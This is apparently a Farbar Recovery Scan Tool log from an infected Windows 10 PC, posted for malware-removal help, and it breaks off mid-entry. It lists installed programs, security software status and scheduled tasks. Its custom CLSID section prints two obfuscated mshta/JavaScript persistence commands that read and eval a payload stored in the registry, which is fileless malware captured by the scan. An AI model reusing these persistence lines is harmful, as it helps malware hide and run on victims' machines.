C:\ProgramData\AVG 2017-10-18 09:00 - 2017-03-18 15:51 - 000000000 ____D C:\WINDOWS\CbsTemp 2017-10-13 20:56 - 2016-01-19 08:44 - 000000000 __RHD C:\Users\Public\AccountPictures 2017-10-13 20:55 - 2017-09-02 02:42 - 000937530 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2017-10-13 16:38 - 2017-09-02 02:39 - 000390864 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2017-10-13 16:34 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\ShellExperiences 2017-10-13 16:34 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\Provisioning 2017-10-13 16:34 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\PolicyDefinitions 2017-10-13 16:33 - 2017-03-18 16:03 - 000230400 _____ (Microsoft Corporation) C:\WINDOWS\system32\msclmd.dll 2017-10-13 16:33 - 2017-03-18 16:03 - 000207872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msclmd.dll 2017-10-12 19:21 - 2017-03-18 16:06 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2017-10-12 19:21 - 2017-03-18 16:06 - 000177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2017-10-12 14:12 - 2016-01-19 09:16 - 000001007 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk 2017-10-11 13:12 - 2016-01-19 13:10 - 000000000 ____D C:\WINDOWS\system32\MRT 2017-10-11 13:05 - 2016-01-19 13:10 - 126925120 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe ==================== Files in the root of some directories ======= 2016-12-01 12:59 - 2016-11-30 12:02 - 000012542 _____ () C:\Program Files (x86)\Common Files\client.wyc 2014-07-09 18:03 - 2016-01-21 15:23 - 021401112 _____ (LastPass) C:\Program Files (x86)\Common Files\lpuninstall.exe 2014-07-11 08:11 - 2014-07-11 10:57 - 000037663 _____ () C:\Users\Charlie\AppData\Roaming\Microsoft Excel 97-2003.ADR 2015-08-20 15:16 - 2015-05-08 15:41 - 000010240 _____ () C:\Users\Charlie\AppData\Local\Z@!-d255baf1-abe1-4f84-8b12-14150417ad4a.tmp 2015-08-20 15:16 - 2015-05-08 15:41 - 000009216 _____ () C:\Users\Charlie\AppData\Local\Z@S!-4d226dde-e80a-4cd1-b594-571eae57a1cf.tmp 2017-09-02 02:41 - 2017-09-02 02:41 - 000000000 ____H () C:\ProgramData\DP45977C.lfl 2014-07-15 11:54 - 2016-11-21 15:21 - 000000934 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc 2017-09-27 06:24 - 2017-10-01 08:12 - 000000274 _____ () C:\ProgramData\ResPntListUNI.txt 2017-09-23 12:16 - 2017-09-23 12:16 - 001593561 ____N ( ) C:\ProgramData\TR.exe Files to move or delete: ==================== C:\ProgramData\TR.exe C:\Users\Charlie\hpbcfgre.dll C:\Users\Charlie\hpbuio32.dll C:\Users\Charlie\hpbuio64.dll C:\Users\Charlie\hpbuiodm64.dll C:\Users\Charlie\hpmco175.dll C:\Users\Charlie\hpmews02.dll C:\Users\Charlie\hpmldm02.dll C:\Users\Charlie\hpmprein.dll C:\Users\Charlie\Install.dll C:\Users\Charlie\Install.exe C:\Users\Charlie\MRNOFXLOG.DAT C:\Users\Charlie\mrn_SyncLog.dat Some files in TEMP: ==================== 2017-10-25 16:33 - 2017-10-25 16:33 - 001856576 _____ (Oracle Corporation) C:\Users\Charlie\AppData\Local\Temp\jre-8u151-windows-au.exe ==================== Bamital & volsnap ====================== (There is no automatic fix for files that do not pass verification.) C:\WINDOWS\system32\winlogon.exe => File is digitally signed C:\WINDOWS\system32\wininit.exe => File is digitally signed C:\WINDOWS\explorer.exe => File is digitally signed C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed C:\WINDOWS\system32\svchost.exe => File is digitally signed C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed C:\WINDOWS\system32\services.exe => File is digitally signed C:\WINDOWS\system32\User32.dll => File is digitally signed C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed C:\WINDOWS\system32\userinit.exe => File is digitally signed C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed C:\WINDOWS\system32\rpcss.dll => File is digitally signed C:\WINDOWS\system32\dnsapi.dll => File is digitally signed C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2017-11-01 09:05 ==================== End of FRST.txt ============================ Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-11-2017 Ran by Charlie (10-11-2017 16:16:21) Running from C:\Users\Charlie\Desktop Windows 10 Pro Version 1703 15063.674 (X64) (2017-09-02 08:16:44) Boot Mode: Safe Mode (with Networking) ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-1808445638-3246226358-2469192111-500 - Administrator - Disabled) Charlie (S-1-5-21-1808445638-3246226358-2469192111-1000 - Administrator - Enabled) => C:\Users\Charlie DefaultAccount (S-1-5-21-1808445638-3246226358-2469192111-503 - Limited - Disabled) Guest (S-1-5-21-1808445638-3246226358-2469192111-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1808445638-3246226358-2469192111-1002 - Limited - Enabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B} AV: AVG Antivirus (Disabled - Up to date) {4D41356F-32AD-7C42-C820-63775EE4F413} AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: AVG Antivirus (Disabled - Up to date) {F620D48B-1497-73CC-F290-58052563BEAE} FW: AVG Antivirus (Disabled) {757AB44A-78C2-7D1A-E37F-CA42A037B368} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 64 Bit HP CIO Components Installer (HKLM\...\{30689060-43BD-46E9-8A54-E6CDB18AAB88}) (Version: 20.2.1 - HP Inc.) Hidden 7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov) Active@ KillDisk 10 (HKLM\...\{6A633DB7-06E4-4EF1-8FD1-7F8812C590AD}_is1) (Version: 10 - LSoft Technologies Inc) Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.012.20098 - Adobe Systems Incorporated) Adobe Flash Player 27 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 27.0.0.183 - Adobe Systems Incorporated) Adobe Reader XI (11.0.20) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.20 - Adobe Systems Incorporated) ANT Drivers Installer x64 (HKLM\...\{7664AF65-7B0D-4171-9F0F-50455278B428}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden AVG (HKLM\...\{E61E6143-4937-43FC-8C12-06B8A987484D}) (Version: 1.211.3 - AVG Technologies) Hidden AVG Internet Security (HKLM-x32\...\AVG Antivirus) (Version: 17.7.3032 - AVG Technologies) AVG PC TuneUp (HKLM-x32\...\{A3DEEC4D-7D8A-465E-90BD-B853A19DDF82}) (Version: 16.75.1 - AVG Technologies) Hidden AVG PC TuneUp (HKLM-x32\...\AVG PC TuneUp) (Version: 16.75.3.10304 - AVG Technologies) AVS Document Converter 2.3.1 (HKLM-x32\...\AVS Document Converter_is1) (Version: 2.3.1.232 - Online Media Technologies Ltd.) AVS Photo Editor 2.2.1.140 (HKLM-x32\...\AVS Photo Editor_is1) (Version: 2.2.1.140 - Online Media Technologies Ltd.) Canon CanoScan LiDE 220 On-screen Manual (HKLM-x32\...\Canon CanoScan LiDE 220 On-screen Manual) (Version: 7.7.0 - Canon Inc.) Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.11.1 - Canon Inc.) Canon LiDE 220 User Registration (HKLM-x32\...\Canon LiDE 220 User Registration) (Version: - Canon Inc.) Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 3.0.0 - Canon Inc.) Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 3.0.0 - Canon Inc.) Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.4.0 - Canon Inc.) CanoScan LiDE 220 Scanner Driver (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_CNQ4811) (Version: 1.00 - Canon Inc.) CCleaner (HKLM\...\CCleaner) (Version: 5.25 - Piriform) Cisco Connect (HKLM-x32\...\Cisco Connect) (Version: 1.4.12068.0 - Cisco Consumer Products LLC) Cisco WebEx Meetings (HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\ActiveTouchMeetingClient) (Version: - Cisco WebEx LLC) Citrix Online Launcher (HKLM-x32\...\{DB014C85-A264-4BCA-A66F-6DD1FCF8EC36}) (Version: 1.0.335 - Citrix) Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.9.2.8 - Dell Inc.) Dell Customer Connect (HKLM-x32\...\{04A41EBC-AB30-4574-A14D-E0CDFE31AB70}) (Version: 1.5.1.0 - Dell Inc.) Dell Data Vault (HKLM\...\{2E55EEFD-2162-4A7D-9158-EDB0305603A6}) (Version: 4.3.7.0 - Dell Inc.) Hidden Dell Digital Delivery (HKLM-x32\...\{693A23FB-F28B-4F7A-A720-4C1263F97F43}) (Version: 3.1.1002.0 - Dell Products, LP) Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc) Dell Foundation Services (HKLM\...\{BDB50421-E961-42F3-B803-6DAC6F173834}) (Version: 3.4.16100.0 - Dell Inc.) Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 1.3.6855.61 - Dell) Dell SupportAssistAgent (HKLM-x32\...\{3ED468C2-2235-4747-90AD-A7A34F0FE70A}) (Version: 1.2.2.8 - Dell) Dell System Detect (HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\58d94f3ce2c27db0) (Version: 7.11.0.6 - Dell) Dell Update - SupportAssist Update Plugin (HKLM\...\{2228BC43-73DA-4F9A-BEE6-8E9C15328513}) (Version: 3.1.1.3832 - Dell Inc.) Dell Update (HKLM-x32\...\{F91263FA-BE4D-439D-9C0A-2E7204E0E9E3}) (Version: 1.9.20.0 - Dell Inc.) Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Dell Inc.) Dropbox 20 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 1.0.8.0 - Dropbox, Inc.) Duplicate Photo Cleaner (HKLM\...\Duplicate Photo Cleaner_is1) (Version: - WebMinds, Inc.) EaseUS Partition Master 12.5 Trial Edition (HKLM-x32\...\EaseUS Partition Master Trial Edition_is1) (Version: - EaseUS) EasyDuplicateFinder v4.7 (HKLM\...\Easy Duplicate Finder 4_is1) (Version: - WebMinds, Inc.) Elevated Installer (HKLM-x32\...\{1052502B-4C91-43F9-B160-AE39ED57C9F0}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Hidden FMW 1 (HKLM\...\{36133E9F-B129-4206-9FB4-13F707787542}) (Version: 1.226.3 - AVG Technologies) Hidden Garmin Express (HKLM-x32\...\{BCC7CA85-E57F-452D-BB44-15A1CE018BD0}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Hidden Garmin Express (HKLM-x32\...\{bd8bd200-9a60-4969-b267-6b565f36e3da}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Garmin Express Tray (HKLM-x32\...\{DA9C865D-6762-4931-8588-0B13B7A0796B}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Hidden Google Chrome (HKLM-x32\...\Google Chrome) (Version: 61.0.3163.100 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden HydraVision (HKLM-x32\...\{65589581-920C-CAE1-58C2-2149D3AA3F39}) (Version: 4.2.180.0 - ATI Technologies Inc.) Hidden Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.7.3.1001 - Intel Corporation) Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation) iSEEK AnswerWorks English Runtime (HKLM-x32\...\{18A8E78B-9EF2-496E-B310-BCD8E4C1DAB3}) (Version: 010.000.0101 - Vantage Linguistics) Java 8 Update 151 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180151F0}) (Version: 8.0.1510.12 - Oracle Corporation) Laplink PCmover Professional (HKLM-x32\...\{99ADB194-BAD6-4787-AC22-A8E4A8346166}) (Version: 10.00.639 - Laplink Software, Inc.) LastPass (uninstall only) (HKLM-x32\...\LastPass) (Version: - LastPass) Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech) Malwarebytes version 3.2.2.2018 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.2.2.2018 - Malwarebytes) Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 16.0.8625.2121 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\OneDriveSetup.exe) (Version: 17.3.7076.1026 - Microsoft Corporation) Microsoft OneNote Home and Student 2016 - en-us (HKLM\...\OneNoteFreeRetail - en-us) (Version: 16.0.8625.2121 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 (HKLM-x32\...\{8e70e4e1-06d7-470b-9f74-a51bef21088e}) (Version: 11.0.51106.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Mozilla Firefox 56.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 56.0 (x86 en-US)) (Version: 56.0 - Mozilla) Mozilla Firefox 56.0.2 (x64 en-US) (HKLM\...\Mozilla Firefox 56.0.2 (x64 en-US)) (Version: 56.0.2 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 56.0.1 - Mozilla) Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.8625.2121 - Microsoft Corporation) Hidden Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.8625.2121 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.8625.2121 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.8326.2107 - Microsoft Corporation) Hidden Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.330 - Qualcomm Atheros Communications) Quicken 2015 (HKLM-x32\...\{00C2D443-43D9-4550-ABEA-318288E23E57}) (Version: 24.1.15.10 - Intuit) Quicken WillMaker Plus 2014 (HKLM-x32\...\{44160FDE-C190-45C1-B8E1-23F00228E572}) (Version: 1.0.0.0 - Nolo) Rapport (HKLM-x32\...\{1DD81E7D-0D28-4CEB-87B2-C041A4FCB215}) (Version: 3.5.1804.161 - Trusteer) Hidden Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10125.31214 - Realtek Semiconductor Corp.) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7544 - Realtek Semiconductor Corp.) Seagate Dashboard (HKLM-x32\...\{EA266F00-A8E7-43A0-8DED-FBFE3F076934}) (Version: 4.2.002.0 - Seagate) TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version: - TechPowerUp) Trusteer Endpoint Protection (HKLM-x32\...\Rapport_msi) (Version: 3.5.1804.161 - Trusteer) TurboTax 2014 (HKLM-x32\...\TurboTax 2014) (Version: 2014.0 - Intuit, Inc) TurboTax 2015 (HKLM-x32\...\TurboTax 2015) (Version: 2015.0 - Intuit, Inc) TurboTax 2016 (HKLM-x32\...\TurboTax 2016) (Version: 2016.0 - Intuit, Inc) Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 4.0.4 - Tweaking.com) Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies) Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.) Windows 10 Update and Privacy Settings (HKLM\...\{4DFCD818-036A-4229-A67D-CF17DC461D92}) (Version: 1.0.14.0 - Microsoft Corporation) Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22243 - Microsoft Corporation) Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.) Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software) ZBot Trojan Remover v1.9.2 (HKLM-x32\...\ZBot Trojan Remover_is1) (Version: 1.9.2.0 - NoVirusThanks Company Srl) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Classes\pdal: "C:\WINDOWS\system32\mshta.exe" "javascript:cCqk8iR0U="9Bm";O53U=new ActiveXObject("WScript.Shell");b5veD1="eq5oh";OoFP7=O53U.RegRead("HKCU\\software\\cllbfyv\\pwgf");pjGqK8X0X="b3xw0t";eval(OoFP7);kwg4nSeU="hwSXwy";" <==== ATTENTION HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Classes\yweguk: cmd.exe /c start "" "C:\Users\Charlie\AppData\Local\Aqiqliqoc\nzaqa.cvex" "javascript:xID4y="x";Tm8=new ActiveXObject("WScript.Shell");uSzMj5PF="dmUa4d40";aD67tp=Tm8.RegRead("HKCU\\software\\cllbfyv\\pwgf");nChf99B="iG";eval(aD67tp);Nrf3hI="6pH7iL3w";" <==== ATTENTION ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) ContextMenuHandlers1: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files (x86)\AVG\Antivirus\ashShA64.dll [2017-10-20] (AVG Technologies CZ, s.r.o.) ContextMenuHandlers1: [AVG Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => C:\Program Files (x86)\AVG\AVG PC TuneUp\SDShelEx-x64.dll [2017-07-26] (AVG Technologies CZ, s.r.o.) ContextMenuHandlers1: [ShellConverter] -> {30A4E07E-068A-4d91-8F05-691283A1336B} => C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSShellConverter64.dll [2013-05-27] (Online Media Technologies Ltd.) ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-08-21] (Malwarebytes) ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) ContextMenuHandlers4: [AVG Disk Space Explorer Shell Extension] -> {4838CD50-7E5D-4811-9B17-C47A85539F28} => C:\Program Files (x86)\AVG\AVG PC TuneUp\DseShExt-x64.dll [2017-07-26] (AVG Technologies CZ, s.r.o.) ContextMenuHandlers4: [AVG Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => C:\Program Files (x86)\AVG\AVG PC TuneUp\SDShelEx-x64.dll [2017-07-26] (AVG Technologies CZ, s.r.o.) ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2017-03-13] (Intel Corporation) ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) ContextMenuHandlers6: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files (x86)\AVG\Antivirus\ashShA64.dll [2017-10-20] (AVG Technologies CZ, s.r.o.) ContextMenuHandlers6: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} => -> No File ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-08-21] (Malwarebytes) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {03A2E7C8-1339-428F-9323-E99F1976CEB9} - \McAfee\McAfee Idle Detection Task -> No File <==== ATTENTION Task: {09257EF5-F419-4D7F-BCD8-D2E362191430} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION Task: {0E9B0B5C-9FF3-4A29-8479-0868A68DD87B} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe Task: {191F9E6F-750B-463B-8275-674A085E6A42} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-09-29] () Task: {21D98608-212B-477C-9E51-862F8F865EFA} - System32\Tasks\McAfeeLogon => C:\PROGRA~1\COMMON~1\McAfee\Platform\McUICnt.exe Task: {22791815-78FB-4088-8BBB-3DA7D50664F8} - System32\Tasks\Antivirus Emergency Update => C:\Program Files (x86)\AVG\Antivirus\AvEmUpdate.exe [2017-10-20] (AVG Technologies CZ, s.r.o.) Task: {2956E29D-A64D-413D-B892-F5AA2AC347BB} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe Task: {2A74738F-77EA-45BE-807D-0DA7AE3821FF} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-12-06] (Piriform Ltd) Task: {30E15181-DAE3-4C0F-B9B0-DFDF919EF936} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION Task: {377D44F2-DA65-41BB-88CF-6FFF1FAB3C41} - System32\Tasks\Java Platform SE Auto Updater => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2017-09-05] (Oracle Corporation) Task: {3999671B-80BF-4CDF-A95C-93FD2F0FE480} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {3B2D8390-8289-4929-BA17-F6A1C85B47FB} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\explorer.exe /NOUACCHECK Task: {3CBC40D7-5079-4162-B3CF-8BB086B1F88F} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe Task: {3DA21760-C086-4BA7-960C-2C1B98E2C622} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION Task: {3E03F475-3149-4094-9896-BA78F8B2E6BC} - System32\Tasks\Adobe Reader and Acrobat Manager => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-19] (Adobe Systems Incorporated) Task: {40897B9F-93AB-425D-93AC-B8BA97E5EF17} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.) Task: {42B3B434-E3AE-470E-99AF-7D12327B8919} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-19] (Adobe Systems Incorporated) Task: {43C39166-DBC4-4D93-BE8B-15FFD6AB03C8} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe Task: {46EB3B5F-0B59-4CAC-A06A-88742BCC1E3C} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-10-31] (Microsoft Corporation) Task: {49072A42-1C33-4821-800D-28DD295D6786} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe Task: {4D2B3324-B32F-4DB4-B0C1-1503C3219780} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe [2017-03-28] () Task: {4FF356D2-FE47-4920-B00B-3E8B260DCA26} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe Task: {528B6446-B6F7-44E3-AA71-6203798B4E57} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe Task: {53C82D5D-CAA2-4928-AD01-FD5CA9402E42} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {54C24529-FE0D-45F3-921C-72B199731A29} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe Task: {56271ECE-25BE-42E2-A083-08593745AC10} - \SystemToolsDailyTest -> No File <==== ATTENTION Task: {595084B0-8061-4646-9643-A34F03C12F44} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.) Task: {5ED329CA-9882-499A-8042-59D048F4FC4A} - System32\Tasks\UninstallDDS-C960901F-CE14-4DE1-9729-1305F719A337 => C:\WINDOWS\TEMP\DeleteFolderTask.exe <==== ATTENTION Task: {602B3DF8-98F4-4CD6-81E9-42D5939CCFE7} - \PCDEventLauncherTask -> No File <==== ATTENTION Task: {6064BBC8-744E-477D-B083-93B9E6B7C7D7} - 